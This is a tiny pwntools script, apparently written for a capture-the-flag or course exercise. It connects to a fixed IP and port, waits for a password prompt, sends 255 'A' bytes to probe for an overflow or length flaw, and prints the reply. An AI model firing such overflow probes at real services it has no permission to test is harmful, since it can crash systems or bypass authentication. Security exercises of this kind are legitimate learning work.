#!/usr/bin/env python3
from pwn import *

host = '140.113.207.245'
port = 30170

conn = remote(host, port)

conn.recvuntil(b'Type Your Password: ')

conn.sendline(b'A' * 255)

print(conn.recvall().decode())
